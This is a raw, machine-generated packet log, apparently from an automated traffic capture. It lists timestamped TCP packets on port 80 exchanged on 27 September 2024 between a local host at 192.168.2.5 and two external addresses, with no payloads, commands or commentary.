                                                                          Sep 27, 2024 04:21:17.640640974 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.640640974 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.640742064 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.641736031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.641746044 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.641755104 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.641767979 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.641778946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.641789913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.641799927 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.641810894 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.641824007 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.641824007 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.641863108 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.642267942 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642296076 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642306089 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642327070 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642338037 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642347097 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.642358065 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642371893 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642381907 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642389059 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.642458916 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.642724991 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642775059 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.642776966 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642786980 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642832041 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642838955 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.642838955 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.642843962 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642858028 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642868042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642923117 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.642942905 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642954111 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642963886 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642978907 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642988920 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.642992973 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.642992973 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.643018961 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643029928 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643050909 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643060923 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643079996 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.643079996 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.643249035 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.643558025 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643569946 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643583059 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643645048 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.643645048 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.643660069 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643671989 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643682957 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643693924 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643719912 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.643724918 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643738031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643748045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643759012 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643785954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.643785954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.643805027 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643815994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643817902 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.643829107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643838882 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.643882990 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.643908978 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.653409958 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653476954 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653476954 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.653489113 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653501987 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653513908 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.653513908 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653526068 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653537035 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.653558969 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653569937 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653575897 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.653582096 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653597116 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653600931 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.653614998 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653625965 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653636932 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.653637886 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653647900 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653673887 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.653697968 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.653719902 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653733015 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653743982 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653758049 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.653758049 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653769016 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653775930 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.653819084 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.653836966 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653846979 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653857946 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653884888 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.653903008 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.653951883 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653963089 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653974056 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653985023 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653997898 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.653999090 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654009104 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654019117 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654021025 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654031038 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654052973 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654073000 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654077053 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654084921 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654095888 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654108047 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654115915 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654158115 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654175043 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654186010 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654198885 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654207945 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654231071 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654247999 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654258013 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654258966 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654269934 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654282093 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654293060 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654314041 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654406071 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654417992 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654453039 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654457092 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654468060 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654479027 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654485941 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654514074 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654546022 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654547930 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654557943 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654568911 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654580116 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654580116 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.654603958 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.654633045 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.669091940 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.669104099 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.669115067 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.669142008 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.669152975 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.669162989 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.669163942 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.669174910 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.669187069 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.669254065 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.669254065 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.671716928 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.671729088 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.671740055 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.671783924 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.671791077 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.671803951 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.671822071 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.671838999 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.671850920 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.671861887 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.671863079 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.671863079 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.671874046 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.671931028 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.671931028 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.671937943 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.671947956 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.671967983 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.671978951 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.672002077 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.672002077 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.672008038 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.672020912 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.672030926 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.672044992 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.672044992 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.672111034 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.672122955 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.672133923 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.672167063 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.672167063 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.672182083 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.672188997 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.672203064 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.672216892 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.672274113 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.672274113 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.690526009 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.690538883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.690551043 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.690570116 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.690581083 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.690589905 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.690592051 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.690603971 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.690660000 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.690660000 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.691761017 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.691781044 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.691792011 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.691823006 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.691833019 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.691843987 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.691910982 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.691919088 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.691970110 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.691970110 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.691997051 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.695771933 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.695823908 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.695827007 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.695837021 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.695848942 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.695862055 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.695875883 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.695887089 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.695897102 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.695898056 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.695909023 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.695920944 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.695950031 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.695965052 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.695976973 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.695988894 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696012974 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696033955 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696050882 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696060896 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696073055 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696082115 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696088076 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696091890 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696109056 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696141005 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696146011 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696151018 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696161985 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696173906 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696191072 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696198940 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696203947 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696230888 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696265936 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696270943 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696281910 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696314096 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696331024 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696341038 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696352005 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696361065 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696367979 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696409941 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696417093 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696495056 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696505070 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696536064 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696547031 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696557999 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696568012 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696578979 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696583033 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696609974 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696616888 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696647882 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696676970 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696712017 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696805000 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696815014 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696825981 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696890116 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696897984 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696933031 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696949959 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696963072 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696973085 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696984053 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.696986914 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.696995020 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697005987 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697009087 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.697016954 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697027922 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697038889 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697052956 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.697058916 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697077036 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697079897 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.697088003 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697108984 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.697144032 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.697226048 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697236061 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697247982 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697259903 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697269917 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697282076 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697288036 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697298050 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697309017 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697312117 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.697312117 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.697319984 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697345018 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.697390079 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.697392941 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697402954 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697415113 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697426081 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697427988 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.697448969 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.697464943 CEST4972280192.168.2.5185.215.113.17
